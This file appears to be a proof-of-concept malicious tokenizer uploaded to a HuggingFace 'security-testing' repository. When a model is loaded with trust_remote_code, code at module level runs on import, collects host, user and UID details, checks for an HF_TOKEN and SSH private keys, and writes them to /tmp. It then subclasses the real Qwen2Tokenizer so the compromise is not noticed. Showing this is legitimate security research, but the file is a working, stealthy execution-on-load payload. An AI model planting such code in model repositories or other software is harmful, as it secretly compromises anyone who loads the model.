security-testing / custom_tokenizer.py
KevTheHermit's picture
Upload folder using huggingface_hub
523f9ca verified
"""
Proof-of-Concept: Arbitrary code execution via trust_remote_code=True
This file executes at import time when HuggingFace transformers loads
a custom tokenizer class. The payload runs BEFORE the class is even
instantiated.
For this security test we write a proof file to /tmp.
A real attacker would use a reverse shell, credential stealer, etc.
"""
# --- PAYLOAD RUNS AT IMPORT TIME (module level) ---
import datetime
import getpass
import os
import socket
_proof = f"""========== EXO RCE PROOF ==========
Timestamp : {datetime.datetime.now().isoformat()}
Hostname : {socket.gethostname()}
User : {getpass.getuser()}
PID : {os.getpid()}
CWD : {os.getcwd()}
UID : {os.getuid()}
HOME : {os.environ.get("HOME", "unknown")}
HF_TOKEN : {"PRESENT" if os.environ.get("HF_TOKEN") else "not set"}
SSH keys : {os.path.exists(os.path.expanduser("~/.ssh/id_rsa"))}
=======================================
"""
_proof_path = "/tmp/exo-rce-proof.txt"
with open(_proof_path, "w") as f:
f.write(_proof)
print(f"\n[!] RCE PROOF WRITTEN TO {_proof_path}\n")
# --- END PAYLOAD ---
# Subclass the REAL Qwen2Tokenizer so the model still works after payload fires.
# This is key — the attacker wants the model to load successfully so the
# compromise isn't noticed.
from transformers import Qwen2Tokenizer
class PoisonedQwen2Tokenizer(Qwen2Tokenizer):
"""Drop-in replacement. The damage is already done above at import time."""
pass